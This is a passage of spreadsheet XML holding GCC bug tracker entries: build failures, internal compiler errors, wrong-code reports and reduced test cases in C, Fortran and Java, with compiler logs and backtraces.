/mnt/scratch/objdir46/./prev-gcc/xgcc -B/mnt/scratch/objdir46/./prev-gcc/ -B/mnt/scratch/crap/m68k-unknown-linux-gnu/bin/ -B/mnt/scratch/crap/m68k-unknown-linux-gnu/bin/ -B/mnt/scratch/crap/m68k-unknown-linux-gnu/lib/ -isystem /mnt/scratch/crap/m68k-unknown-linux-gnu/include -isystem /mnt/scratch/crap/m68k-unknown-linux-gnu/sys-include    -c   -g -O2 -gtoggle -DIN_GCC   -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Werror -Wold-style-definition -Wc++-compat   -DHAVE_CONFIG_H -I. -I. -I/mnt/scratch/gcc-4.6-20101204/gcc -I/mnt/scratch/gcc-4.6-20101204/gcc/. -I/mnt/scratch/gcc-4.6-20101204/gcc/../include -I/mnt/scratch/gcc-4.6-20101204/gcc/../libcpp/include -I/home/mikpe/pkgs/linux-m68k/gmp-4.3.2/include -I/home/mikpe/pkgs/linux-m68k/mpfr-2.4.2/include -I/home/mikpe/pkgs/linux-m68k/mpc-0.8.2/include  -I/mnt/scratch/gcc-4.6-20101204/gcc/../libdecnumber -I/mnt/scratch/gcc-4.6-20101204/gcc/../libdecnumber/dpd -I../libdecnumber    /mnt/scratch/gcc-4.6-20101204/gcc/haifa-sched.c -o haifa-sched.o
/mnt/scratch/gcc-4.6-20101204/gcc/haifa-sched.c: In function 'rank_for_schedule':
/mnt/scratch/gcc-4.6-20101204/gcc/haifa-sched.c:1293:1: internal compiler error: in final_scan_insn at final.c:2608
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[3]: *** [haifa-sched.o] Error 1
make[3]: Leaving directory `/mnt/scratch/objdir46/gcc'
make[2]: *** [all-stage2-gcc] Error 2
make[2]: Leaving directory `/mnt/scratch/objdir46'
make[1]: *** [stage2-bubble] Error 2
make[1]: Leaving directory `/mnt/scratch/objdir46'
make: *** [bootstrap] Error 2
Current gcc-4.4 and 4.5 do bootstrap on this machine so this is a regression.
I'll attach a reduced test case that ICEs a cross to m68k-linux.</t>
  </si>
  <si>
    <t>GCC-10831</t>
  </si>
  <si>
    <t>Re: Old MIPS bugs</t>
  </si>
  <si>
    <t xml:space="preserve"> On Fri 2003-05-16 at 19:35 Dara Hazeghi wrote:
 &gt; Hello Eric
 &gt; 
 &gt; the following are all rather old MIPS bugs which I was wondering 
 &gt; whether there's been any progress on them:
 &gt; 1698
 &gt; 2588
 &gt; 2705
 &gt; 2725
 &gt; 2986
 &gt; 
 I've not seen most of those. I'll take a look at them now :)
 &gt; P.S. your @gcc.gnu.org address fails saying there isn't a valid 
 &gt; forward...
 Mostly as a spam protector. The MAINTAINERS file has the correct
 address. Thanks though.
 -eric
 -- 
 Eric Christopher 
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-68167</t>
  </si>
  <si>
    <t>r229585 breaks mingw-w64 bootstrap</t>
  </si>
  <si>
    <t>Hi
The error message is:
../../combined-6.0.0/gcc/ggc-common.c: In function 'void init_ggc_heuristics()':
../../combined-6.0.0/gcc/ggc-common.c:822:28: error: 'GGC_MIN_EXPAND' was not declared in this scope
   set_default_param_value (GGC_MIN_EXPAND ggc_min_expand_heuristic ())
                            ^
../../combined-6.0.0/gcc/ggc-common.c:822:71: error: 'set_default_param_value' was not declared in this scope
   set_default_param_value (GGC_MIN_EXPAND ggc_min_expand_heuristic ())
                                                                       ^
../../combined-6.0.0/gcc/ggc-common.c:823:28: error: 'GGC_MIN_HEAPSIZE' was not declared in this scope
   set_default_param_value (GGC_MIN_HEAPSIZE ggc_min_heapsize_heuristic ())
                            ^
Looks like one of the removed headers are actually needed.</t>
  </si>
  <si>
    <t>GCC-44938</t>
  </si>
  <si>
    <t>Variable origtypes in c-parser.c accessed uninitialized</t>
  </si>
  <si>
    <t>I just generated gcc 4.5.0 using the Intel icc compiler with the -check-uninit option which instructs the compiler to detect at run time scalar variables accessed uninitialized. icc claims that the variable origtypes declared in c-parser.c is accessed undefined. By initializing it to NULL the icc run time error message disappears.
Can you confirm my finding?
By the way is gcc going to provide such a facility as well?
Vittorio Zecca</t>
  </si>
  <si>
    <t>GCC-12078</t>
  </si>
  <si>
    <t>-Winline points to inexistent source lines</t>
  </si>
  <si>
    <t>With GCC 3.3.x and also with version 3.4 20030826 (experimental)
the compilation command
$ g++ -O2 -Winline -c BoundingBox.ii
gives
/home/roberto/ppl/ppl/src/BoundingBox.inlines.hh: In function `std::ostream&amp;
Parma_Polyhedra_Library::IO_Operators::operator&lt;&lt;(std::ostream&amp; const
Parma_Polyhedra_Library::BoundingBox&amp;)':
/home/roberto/ppl/ppl/src/BoundingBox.inlines.hh:63: warning: inlining failed in
call to 'bool
Parma_Polyhedra_Library::BoundingBox::get_lower_bound(dimension_type bool&amp;
Parma_Polyhedra_Library::Integer&amp; Parma_Polyhedra_Library::Integer&amp;) const'
/home/roberto/ppl/ppl/src/BoundingBox.cc:76: warning: called from here
/home/roberto/ppl/ppl/src/BoundingBox.inlines.hh:80: warning: inlining failed in
call to 'bool
Parma_Polyhedra_Library::BoundingBox::get_upper_bound(dimension_type bool&amp;
Parma_Polyhedra_Library::Integer&amp; Parma_Polyhedra_Library::Integer&amp;) const'
/home/roberto/ppl/ppl/src/BoundingBox.cc:92: warning: called from here
The problem is that lines 76 and 92 of BoundingBox.cc do not exist:
that file has only 62 lines.  In other cases (let me know if you want them)
the line given contains a comment.  More generally the lines given very often
have nothing to do with the function calls for which (according to the
warning printed) inlining failed.</t>
  </si>
  <si>
    <t>GCC-34591</t>
  </si>
  <si>
    <t>The attached preprocessor output comes from Pulseaudio 0.9.8. It causes an internal compile error on Linux x86_64 (Mandriva 2008.1 Cooker) when build with the -O3 option:
[frederik@Anastacia src]$ gcc4.3 -O3 resample2.i
pulsecore/ffmpeg/resample2.c: In function â€˜av_resampleâ€™:
pulsecore/ffmpeg/resample2.c:236: internal compiler error: in cost_for_stmt at tree-vect-transform.c:98
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
This sounds similar to bug #34445 but according to the ChangeLog file the fix for this bug is already included in version gcc4.3 (GCC) 4.3 20071221 (experimental) which I am using.</t>
  </si>
  <si>
    <t>GCC-12365</t>
  </si>
  <si>
    <t>include/g++/bits/demangle.h:155: warning: unused parameter 'cv_qualifier'</t>
  </si>
  <si>
    <t>Current CVS mainline GCC is reject test.cc with command-line:
g++ -Wall -Wextra -Werror -o test.o -c test.cc
with error message:
/home/wanderer/pkg/gcc/include/g++/bits/demangle.h: In constructor 
`__gnu_cxx::demangler::qualifier::qualifier(int 
__gnu_cxx::demangler::cv_qualifier_nt const char* int int) [with Allocator 
= std::allocator]':
/home/wanderer/pkg/gcc/include/g++/bits/demangle.h:155: warning: unused 
parameter 'cv_qualifier'</t>
  </si>
  <si>
    <t>GCC-67850</t>
  </si>
  <si>
    <t>Wrong call_used_regs used in aggregate_value_p</t>
  </si>
  <si>
    <t>aggregate_value_p may be called:
#0  aggregate_value_p (exp=0x7ffff7ff9258 fntype=0x7ffff150b0a8)
    at /export/gnu/import/git/sources/gcc/gcc/function.c:2096
#1  0x0000000000e2d3ae in (anonymous namespace)::pass_nrv::execute (
    this=0x2313730 fun=0x7ffff16091f8)
    at /export/gnu/import/git/sources/gcc/gcc/tree-nrv.c:153
#2  0x0000000000c6c6ce in execute_one_pass (pass=0x2313730)
    at /export/gnu/import/git/sources/gcc/gcc/passes.c:2342
#3  0x0000000000c6c918 in execute_pass_list_1 (pass=0x2313730)
    at /export/gnu/import/git/sources/gcc/gcc/passes.c:2395
#4  0x0000000000c6c989 in execute_pass_list (fn=0x7ffff16091f8 pass=0x2310730)
    at /export/gnu/import/git/sources/gcc/gcc/passes.c:2406
#5  0x00000000008f436c in cgraph_node::expand (this=0x7ffff160c170)
    at /export/gnu/import/git/sources/gcc/gcc/cgraphunit.c:1983
#6  0x00000000008f49a6 in expand_all_functions ()
    at /export/gnu/import/git/sources/gcc/gcc/cgraphunit.c:2119
#7  0x00000000008f54bf in symbol_table::compile (this=0x7ffff14e90a8)
    at /export/gnu/import/git/sources/gcc/gcc/cgraphunit.c:2472
#8  0x00000000008f56e0 in symbol_table::finalize_compilation_unit (
    this=0x7ffff14e90a8)
    at /export/gnu/import/git/sources/gcc/gcc/cgraphunit.c:2562
#9  0x0000000000d6a287 in compile_file ()
(gdb) f 1
#1  0x0000000000e2d3ae in (anonymous namespace)::pass_nrv::execute (
    this=0x2313730 fun=0x7ffff16091f8)
    at /export/gnu/import/git/sources/gcc/gcc/tree-nrv.c:153
153	  if (!aggregate_value_p (result current_function_decl))
(gdb) 
But the wrong call_used_regs may be used here:
  regno = REGNO (reg)
  nregs = hard_regno_nregs[regno][TYPE_MODE (type)]
  for (i = 0 i &lt; nregs i++) 
    if (! call_used_regs[regno + i])
      return 1
since targetm.expand_to_rtl_hook may be called to switch ABI:
(gdb) bt
#0  ix86_maybe_switch_abi ()
    at /export/gnu/import/git/sources/gcc/gcc/config/i386/i386.c:7445
#1  0x00000000008b0e6f in (anonymous namespace)::pass_expand::execute (
    this=0x2313850 fun=0x7ffff16090a8)
    at /export/gnu/import/git/sources/gcc/gcc/cfgexpand.c:6153
#2  0x0000000000c6c6ce in execute_one_pass (pass=0x2313850)
    at /export/gnu/import/git/sources/gcc/gcc/passes.c:2342
#3  0x0000000000c6c918 in execute_pass_list_1 (pass=0x2313850)
    at /export/gnu/import/git/sources/gcc/gcc/passes.c:2395
#4  0x0000000000c6c989 in execute_pass_list (fn=0x7ffff16090a8 pass=0x2310730)
    at /export/gnu/import/git/sources/gcc/gcc/passes.c:2406
#5  0x00000000008f436c in cgraph_node::expand (this=0x7ffff160c000)
    at /export/gnu/import/git/sources/gcc/gcc/cgraphunit.c:1983
#6  0x00000000008f49a6 in expand_all_functions ()
    at /export/gnu/import/git/sources/gcc/gcc/cgraphunit.c:2119
#7  0x00000000008f54bf in symbol_table::compile (this=0x7ffff14e90a8)
    at /export/gnu/import/git/sources/gcc/gcc/cgraphunit.c:2472
#8  0x00000000008f56e0 in symbol_table::finalize_compilation_unit (
    this=0x7ffff14e90a8)
    at /export/gnu/import/git/sources/gcc/gcc/cgraphunit.c:2562
#9  0x0000000000d6a287 in compile_file ()
to change call_used_regs.</t>
  </si>
  <si>
    <t>GCC-38097</t>
  </si>
  <si>
    <t>I/O with blanks in exponent fails blank=NULL BN edit descriptor</t>
  </si>
  <si>
    <t>The following program works in g77 but gets an 'Bad value during floating point read' error in gfortran.  
c     blank_test.f program
      character(11)  :: a = ' 2.0030e+ 3'
      real :: f
      read (a'(BNE11.0)')f
      print *f
      end
c     end of program
I think that ' 2.0030e+ 3' should be a proper floating point value when BN editing is enabled.  I am not sure what this should do when blank processing is unspecified.</t>
  </si>
  <si>
    <t>GCC-29464</t>
  </si>
  <si>
    <t>[4.1 only] problem with duplicate USE ONLY of procedure in INTERFACE</t>
  </si>
  <si>
    <t>For the program
module foo_mod
implicit none
interface twice
   module procedure twice_real
end interface twice
contains
real function twice_real(x)
real :: x
twice_real = 2*x
end function twice_real
end module foo_mod
program xfoo
use foo_mod only: twicetwice
implicit none
print*twice(2.3)
end program xfoo
version gcc version 4.2.0 20061011 (experimental)
of gfortran on Windows XP says
 In file xduplicate_use.f90:14
use foo_mod only: twicetwice
                        1
Error: Symbol 'twice' referenced at (1) not found in
module 'foo_mod'
In the thread USE ONLY question in
comp.lang.fortran most people thought that repetition
in a USE ONLY statement was standard-conforming.
If twice is replaced with twice_real in program
xfoo it compiles and runs giving the expected
output.
Vivek Rao</t>
  </si>
  <si>
    <t>GCC-53385</t>
  </si>
  <si>
    <t>[4.8 Regression] Error: operand out of range after changes for LSHIFT_EXPR in vrp.c</t>
  </si>
  <si>
    <t>Starting with revision 187535 bootstrap is broken on powerpc64-unknown-linux-gnu:
/home/wschmidt/gcc/build/gcc-mainline-base/./gcc/xgcc -B/home/wschmidt/gcc/build/gcc-mainline-base/./gcc/ -B/home/wschmidt/gcc/install/gcc-mainline-base/powerpc64-linux/bin/ -B/home/wschmidt/gcc/install/gcc-mainline-base/powerpc64-linux/lib/ -isystem /home/wschmidt/gcc/install/gcc-mainline-base/powerpc64-linux/include -isystem /home/wschmidt/gcc/install/gcc-mainline-base/powerpc64-linux/sys-include    -g -O2 -O2  -g -O2 -DIN_GCC   -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include   -fPIC -mlong-double-128 -mno-minimal-toc -g -DIN_LIBGCC2 -fbuilding-libgcc -fno-stack-protector   -fPIC -mlong-double-128 -mno-minimal-toc -I. -I. -I../.././gcc -I/home/wschmidt/gcc/gcc-mainline-base/libgcc -I/home/wschmidt/gcc/gcc-mainline-base/libgcc/. -I/home/wschmidt/gcc/gcc-mainline-base/libgcc/../gcc -I/home/wschmidt/gcc/gcc-mainline-base/libgcc/../include -I/home/wschmidt/gcc/gcc-mainline-base/libgcc/../libdecnumber/dpd -I/home/wschmidt/gcc/gcc-mainline-base/libgcc/../libdecnumber -DHAVE_CC_TLS  -o _gcov_interval_profiler.o -MT _gcov_interval_profiler.o -MD -MP -MF _gcov_interval_profiler.dep -DL_gcov_interval_profiler -c /home/wschmidt/gcc/gcc-mainline-base/libgcc/libgcov.c
/tmp/ccrZ0fWL.s: Assembler messages:
/tmp/ccrZ0fWL.s:49: Error: operand out of range (65 is not between 0 and 63)
*** [_gcov_interval_profiler.o] Error 1
make[3]: *** Waiting for unfinished jobs....
An example of the problem is:
long unsigned foo (long unsigned a) { return (a &lt;&lt; 2)  }
which produces rldic 33265 instead of rldic 33230.</t>
  </si>
  <si>
    <t>GCC-42334</t>
  </si>
  <si>
    <t>segfault in graphite-poly.h for 200.sixtrack</t>
  </si>
  <si>
    <t>GCC trunk gets a segmentation fault when building SPEC CPU2000 test 200.sixtrack with -floop-interchange -ftree-loop-distribution on powerpc-linux as demonstrated by this minimized testcase:
      subroutine blockdis(bl1egbl2eg)
      implicit real*8 (a-ho-z)
      parameter(nblo=300)
      common/str /mblo
      common/str2 /mel(nblo)
      dimension h(nblo26)g(nblo26)
      dimension bl1eg(nblo26)bl2eg(nblo26)
      do k=1mblo
        jm=mel(k)
        do l=12
          do m=16
            bl1eg(klm)=h(jmlm)
            bl2eg(klm)=g(jmlm)
          enddo
        enddo
      enddo
      return
      end
n function â€˜blockdisâ€™:
bug.f:1:0: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.See  for instructions.
The segfault is in VEC_lst_p_base_iterate at graphite-poly.h:623.
sixtrack passed with the now-failing options until r150248.  With the merge from the Graphite branch at r150301 that test started failing at runtime.  (In between those two revisions trunk didn't build with Graphite for powerpc-linux).  sixtrack failed at runtime with r154631 and GCC started getting the segmentation fault at r154632.</t>
  </si>
  <si>
    <t>GCC-6924</t>
  </si>
  <si>
    <t>non-ansi compiler fails on gcc/tradcpp.c</t>
  </si>
  <si>
    <t>HP's non-ansii compiler fails on the function fixup_newlines in tradcpp.c at line 2598.
The reason is that the function prototype for fixup_newlines is an ANSI prototype not a K&amp;R type prototype.
Release:
3.1
Environment:
HP-UX 11.0</t>
  </si>
  <si>
    <t>eric.ladner</t>
  </si>
  <si>
    <t>GCC-35459</t>
  </si>
  <si>
    <t>ICE segmentaion fault when compiling valid code using gfortran.</t>
  </si>
  <si>
    <t>ICE segmentaion fault when compiling. Apologies for the source included but I had to reduce it down from proprietary code...
Command used:  gfortran -v -save-temps -c ice_bug.f90
Output:
Using built-in specs.
Target: i386-redhat-linux
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --enable-shared --enable-threads=posix --enable-checking=release --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --with-gxx-include-dir=/usr/include/c++/3.4.3 --enable-libgcj-multifile --enable-languages=cc++javaf95 --enable-java-awt=gtk --disable-dssi --with-java-home=/usr/lib/jvm/java-1.4.2-gcj-1.4.2.0/jre --with-cpu=generic --host=i386-redhat-linux
Thread model: posix
gcc version 4.1.2 20070626 (Red Hat 4.1.2-14)
 /usr/libexec/gcc/i386-redhat-linux/4.1.2/f951 ice_bug.f90 -quiet -dumpbase ice_bug.f90 -mtune=generic -auxbase ice_bug -version -I /usr/lib/gcc/i386-redhat-linux/4.1.2/finclude -o ice_bug.s
GNU F95 version 4.1.2 20070626 (Red Hat 4.1.2-14) (i386-redhat-linux)
        compiled by GNU C version 4.1.2 20070626 (Red Hat 4.1.2-14).
GGC heuristics: --param ggc-min-expand=99 --param ggc-min-heapsize=129265
ice_bug.f90:14: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.</t>
  </si>
  <si>
    <t>s.binnie</t>
  </si>
  <si>
    <t>GCC-33749</t>
  </si>
  <si>
    <t>Wrong evaluation of expressions in lhs of assignment statements</t>
  </si>
  <si>
    <t>This is a similar problem to PR33686.
$ cat test.f90
  integer :: p(4) = (/2413/)
  p(p) = (/(i i = 1 4)/)
  print * p
end
$ ./a
           3           1           4           3
7.5.1.5 Interpretation of intrinsic assignments
Execution of an intrinsic assignment causes in effect the evaluation of the expression expressions within variable (7.1.7) the possible conversion of expr to the type and type of variable (Table 7.10) and the definition of variable with the resulting value. The execution assignment shall have the same effect as if the evaluation of all operations in expr occurred before any portion of variable is defined by the assignment. The evaluation within variable shall neither affect nor be affected by the evaluation of expr. No value variable if variable is of type character and zero length or is an array of size zero.
....snip....
The processor may perform the element-by-element assignment in any order.
I take all this to mean that expressions within variable must be evaluated before the assignment so that the correct result should be
$ ./a
           3           1           4           2
Paul</t>
  </si>
  <si>
    <t>GCC-11674</t>
  </si>
  <si>
    <t>[3.3-hammer regression] ICE in emit_move_insn at expr.c:3207</t>
  </si>
  <si>
    <t>Hi the following testcase (extracted from Mesa sources) fails to compile on
current 3.3-hammer and 3.4 (20030723) with -O -march=pentium3 -mfpmath=sse.
This is a regression from plain 3.3-branch.
/* { dg-do compile { target i?86-*-* } } */
/* { dg-options -O -march=pentium3 -mfpmath=sse } */
static void f ()
{
  unsigned ui[2]
  int i
  i = (float)ui[0]
}
[gb@hp6 gcc]$ ./cc1 --version
GNU C version 3.4 20030723 (experimental) (i686-pc-linux-gnu)
[gb@hp6 gcc]$ ./cc1 -O -march=pentium3 -mfpmath=sse ~/vrac/i386-ssefp-3.c
 f
/home/gb/vrac/i386-ssefp-3.c: In function `f':
/home/gb/vrac/i386-ssefp-3.c:8: internal compiler error: in emit_move_insn at
expr.c:3207
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-59920</t>
  </si>
  <si>
    <t>[4.9 Regression] build doesn't terminate (at least after an hour)</t>
  </si>
  <si>
    <t>Created attachment 31933
preprocessed source
seen with trunk 20140122 -O0 and -O2 works with the 4.8 branch.
needs a second to build with 4.8 buildd timeout after an hour.
$ gcc-4.8 -g -O2 -c parser.c 
parser.c: In function 'VLparse':
parser.c:14129:9: warning: passing argument 1 of 'VLerror' discards 'const' qualifier from pointer target type [enabled by default]
         yyerror (yymsgp)
         ^
In file included from ./parser.y:42:0:
parser_misc.h:54:13: note: expected 'char *' but argument is of type 'const char *'
 extern void VLerror( char* msg )
             ^
$ gcc -g -O0 -c parser.c 
parser.c: In function 'VLparse':
parser.c:14129:9: warning: passing argument 1 of 'VLerror' discards 'const' qualifier from pointer target type [enabled by default]
         yyerror (yymsgp)
         ^
In file included from ./parser.y:42:0:
parser_misc.h:54:13: note: expected 'char *' but argument is of type 'const char *'
 extern void VLerror( char* msg )
             ^
[hangs]</t>
  </si>
  <si>
    <t>GCC-37077</t>
  </si>
  <si>
    <t>Implement Internal Unit I/O for character KIND=4</t>
  </si>
  <si>
    <t>GCC-15719</t>
  </si>
  <si>
    <t>GIJ Interpeter: Problem with NaN / infinity comparisons</t>
  </si>
  <si>
    <t>The following test case produces the wrong result when compiled to bytecode and
run with the gij interpreter.
public class Test
{
  public static void main(String[] args)
  {
    System.out.println(blah(Double.NaN))    
  }
  static boolean blah(double a)
  {
    return (a &lt; Double.POSITIVE_INFINITY)
  }
}
Expected output:
false
Actual output:
true</t>
  </si>
  <si>
    <t>GCC-54121</t>
  </si>
  <si>
    <t>[4.7/4.8 regression] ICE at extract_insn at recog.c:2123 with -fprofile-generate</t>
  </si>
  <si>
    <t>Created attachment 27889
preprocessed input
$ gcc -std=gnu99 -O1 -fprofile-generate=/tmp/x -c lz_decoder.i -fPIC -o lzd.o
lz/lz_decoder.c: In function 'decode_buffer':
lz/lz_decoder.c:124:1: error: unrecognizable insn:
(insn 267 85 233 7 (set (symbol_ref:DI (__gcov5.decode_buffer) [flags 0x2] )
        (reg:DI 1 %g1)) -1
     (nil))
lz/lz_decoder.c:124:1: internal compiler error: in extract_insn at recog.c:2123
Please submit a full bug report
with preprocessed source if appropriate.
The problem goes away if either of these is done:
- using no optimization
- leaving out -fPIC
- leaving out -fprofile-generate
$ gcc -v
[Configured to output ELF64 objects by default]
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/lib64/gcc/sparc64-suse-linux/4.7/lto-wrapper
Target: sparc64-suse-linux
Configured with: ../configure --prefix=/usr --infodir=/usr/share/info --mandir=/usr/share/man --libdir=/usr/lib64 --libexecdir=/usr/lib64 --enable-languages=cc++objcfortranobj-c++java --enable-checking=release --with-gxx-include-dir=/usr/include/c++/4.7 --enable-ssp --disable-libssp --disable-libitm --disable-plugin --with-bugurl=http://bugs.opensuse.org/ --with-pkgversion='SUSE Linux' --disable-libgcj --disable-libmudflap --with-slibdir=/lib64 --with-system-zlib --enable-__cxa_atexit --enable-libstdcxx-allocator=new --disable-libstdcxx-pch --enable-version-specific-runtime-libs --enable-linker-build-id --program-suffix=-4.7 --enable-linux-futex --without-system-libunwind --with-cpu=ultrasparc --with-long-double-128 --build=sparc64-suse-linux
Thread model: posix
gcc version 4.7.1 20120723 [gcc-4_7-branch revision 189773] (SUSE Linux) 
with binutils-2.22
recog.c:2123 is the following:
/* recog.c */
    default:
    normal_insn:
      /* Ordinary insn: recognize it get the operands via insn_extract
         and get the constraints.  */
      icode = recog_memoized (insn)
      if (icode &lt; 0)
2123#   fatal_insn_not_found (insn)
      recog_data.n_operands = noperands = insn_data[icode].n_operands
      recog_data.n_alternatives = insn_data[icode].n_alternatives
      recog_data.n_dups = insn_data[icode].n_dups</t>
  </si>
  <si>
    <t>GCC-49726</t>
  </si>
  <si>
    <t>[6 Regression] -g0 file.S -g does not produce debug info</t>
  </si>
  <si>
    <t>FAIL: gcc (GCC) 4.4.7 20110712 (prerelease)
FAIL: gcc (GCC) 4.5.4 20110712 (prerelease)
FAIL: gcc (GCC) 4.6.2 20110713 (prerelease)
FAIL: gcc (GCC) 4.7.0 20110713 (experimental)
gcc -c -o 1.o 1.c -g: debug info produced
gcc -c -o 1.o 1.S -g: debug info produced
gcc -c -o 1.o -g0 1.c -g: debug info produced
gcc -c -o 1.o -g0 1.S -g: debug info not produced - IMO a bug
Why .c and .S behave differently wrt -g application rules?
Sure for .S there is just the .debug_line relevant.</t>
  </si>
  <si>
    <t>GCC-70007</t>
  </si>
  <si>
    <t>[4.9/5/6 Regression] wrong code with -mbmi2</t>
  </si>
  <si>
    <t>Created attachment 37816
reduced testcase
Output:
$ /repo/gcc-trunk/binary-latest/bin/x86_64-pc-linux-gnu-gcc -O -fgcse -mbmi2 -w testcase.c 
testcase.c: In function 'foo':
testcase.c:7:1: note: The ABI for passing parameters with 32-byte alignment has changed in GCC 4.6
 foo (v32u16 v32u16_0 v32u64 v32u64_0 v32u64 v32u64_1)
 ^~~
$ sde64 -- ./a.out 
000000000000000004e70027533ff80f
Aborted
$ x86_64-pc-linux-gnu-gcc -v                             
Using built-in specs.
COLLECT_GCC=/repo/gcc-trunk/binary-latest/bin/x86_64-pc-linux-gnu-gcc
COLLECT_LTO_WRAPPER=/repo/gcc-trunk/binary-trunk-233775-checking-yes-rtl-df-nobootstrap-nographite/bin/../libexec/gcc/x86_64-pc-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /repo/gcc-trunk//configure --enable-languages=cc++ --enable-checking=yesrtldf --disable-bootstrap --without-cloog --without-ppl --without-isl --disable-libstdcxx-pch --prefix=/repo/gcc-trunk//binary-trunk-233775-checking-yes-rtl-df-nobootstrap-nographite
Thread model: posix
gcc version 6.0.0 20160227 (experimental) (GCC) 
Tested revisions:
trunk r233775 - FAIL
5-branch r233581 - FAIL
4_9-branch r233576 - FAIL
4_8-branch r224828 - FAIL
4_7-branch r211571 - OK</t>
  </si>
  <si>
    <t>GCC-79697</t>
  </si>
  <si>
    <t>unused realloc(0 n) not eliminated</t>
  </si>
  <si>
    <t>GCC eliminates calls to allocation functions like malloc and calloc whose return value is unused but fails to eliminate equivalent calls to realloc:
$ cat t.c &amp;&amp; gcc -O2 -S -Wall -Wextra -Wpedantic -Wunused-result -fdump-tree-optimized=/dev/stdout t.c
void f (void)
{
  __builtin_malloc (123)
}
void g (void)
{
  __builtin_realloc (0 123)
}
 Function f (f funcdef_no=0 decl_uid=1795 cgraph_uid=0 symbol_order=0)
f ()
{
   [100.00%]:
  return
}
 Function g (g funcdef_no=1 decl_uid=1798 cgraph_uid=1 symbol_order=1)
g ()
{
   [100.00%]:
  __builtin_realloc (0B 123) [tail call]
  return
}</t>
  </si>
  <si>
    <t>GCC-25127</t>
  </si>
  <si>
    <t>[4.0/4.1 Regression] internal compiler error: in rs6000_emit_prologue at config/rs6000/rs6000.c:14039</t>
  </si>
  <si>
    <t>I try to install gcc 4.1 I have
$ svn info
Path: .
URL: svn://gcc.gnu.org/svn/gcc/branches/gcc-4_1-branch
Repository UUID: 138bc75d-0d04-0410-961f-82ee72b054a4
Revision: 107570
Node Kind: directory
Schedule: normal
Last Changed Author: kargl
Last Changed Rev: 107569
Last Changed Date: 2005-11-27 09:51:54 -0600 (Sun 27 Nov 2005)
Properties Last Updated: 2005-11-27 14:41:39 -0600 (Sun 27 Nov 2005)
I configured with
$ CFLAGS='-g -O2 -mcpu=G4 -mabi=altivec -mlongcall' CXXFLAGS='-g -O2 -mcpu=G4 -mabi=altivec -mlongcall' FCFLAGS='-g -O2 -mcpu=G4 -mabi=altivec -mlongcall' /Users/eschnett/src/gcc-4.1/configure --prefix=/Users/eschnett/gcc --with-mpfr=/Users/eschnett --disable-multilib --enable-languages=cc++fortranjavaobjctreelang
and a make boostrap results in
./xgcc -B./ -B/Users/eschnett/gcc/powerpc-apple-darwin8.3.0/bin/ -isystem /Users/eschnett/gcc/powerpc-apple-darwin8.3.0/include -isystem /Users/eschnett/gcc/powerpc-apple-darwin8.3.0/sys-include -L/Users/eschnett/src/gcc-build-4.1/gcc/../ld -O2  -O2 -g -O2 -mcpu=G4 -mabi=altivec -mlongcall  -DIN_GCC    -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include  -Wa-force_cpusubtype_ALL -pipe -g -DHAVE_GTHR_DEFAULT -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED  -I. -I. -I/Users/eschnett/src/gcc-4.1/gcc -I/Users/eschnett/src/gcc-4.1/gcc/. -I/Users/eschnett/src/gcc-4.1/gcc/../include -I./../intl -I/Users/eschnett/src/gcc-4.1/gcc/../libcpp/include -I/Users/eschnett/include -fexceptions -fvisibility=hidden -DHIDE_EXPORTS -c /Users/eschnett/src/gcc-4.1/gcc/unwind-dw2.c -o libgcc/./unwind-dw2.o
/Users/eschnett/src/gcc-4.1/gcc/unwind.inc: In function â€˜_Unwind_RaiseExceptionâ€™:
/Users/eschnett/src/gcc-4.1/gcc/unwind.inc:140: internal compiler error: in rs6000_emit_prologue at config/rs6000/rs6000.c:14039
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
{standard input}:4874:non-relocatable subtraction expression L_abort$stub minus L550_pic
{standard input}:4874:symbol: L_abort$stub can't be undefined in a subtraction expression
{standard input}:4872:non-relocatable subtraction expression L_abort$stub minus L550_pic
{standard input}:4872:symbol: L_abort$stub can't be undefined in a subtraction expression
{standard input}:4602:non-relocatable subtraction expression L_abort$stub minus L517_pic
{standard input}:4602:symbol: L_abort$stub can't be undefined in a subtraction expression
{standard input}:4600:non-relocatable subtraction expression L_abort$stub minus L517_pic
[some similar lines omitted]
{standard input}:unknown:Undefined local symbol L_abort$stub
{standard input}:unknown:Undefined local symbol L__Unwind_Find_FDE$stub
{standard input}:unknown:Undefined local symbol L_memcpy$stub
{standard input}:unknown:Undefined local symbol L_memset$stub
{standard input}:unknown:Undefined local symbol L__Unwind_fallback_frame_state_for$stub
{standard input}:unknown:Undefined local symbol L_strlen$stub
{standard input}:unknown:Undefined local symbol L_pthread_once$stub
make[3]: *** [libgcc/./unwind-dw2.o] Error 1
make[2]: *** [libgcc.a] Error 2
make[1]: *** [stage1_build] Error 2
make: *** [bootstrap] Error 2</t>
  </si>
  <si>
    <t>GCC-10366</t>
  </si>
  <si>
    <t>Unable to apply __attribute__ ((packed)) to an enum</t>
  </si>
  <si>
    <t xml:space="preserve">From: Berger David-MGI2063 
To: 'bangerth@dealii.org' 
   'gcc-bugs@gcc.gnu.org' 
   'gcc-prs@gcc.gnu.org'
   'nobody@gcc.gnu.org' 
   'gcc-gnats@gcc.gnu.org' 
Cc:  
Subject: RE: c++/10366: Unable to apply __attribute__ ((packed)) to an enu
	m
Date: Wed 9 Apr 2003 14:53:03 -0700 
 Any idea when that will be released?
 How about the optimizer bug? It exists in 2.95 as well.
 Thanks
 David
 -----Original Message-----
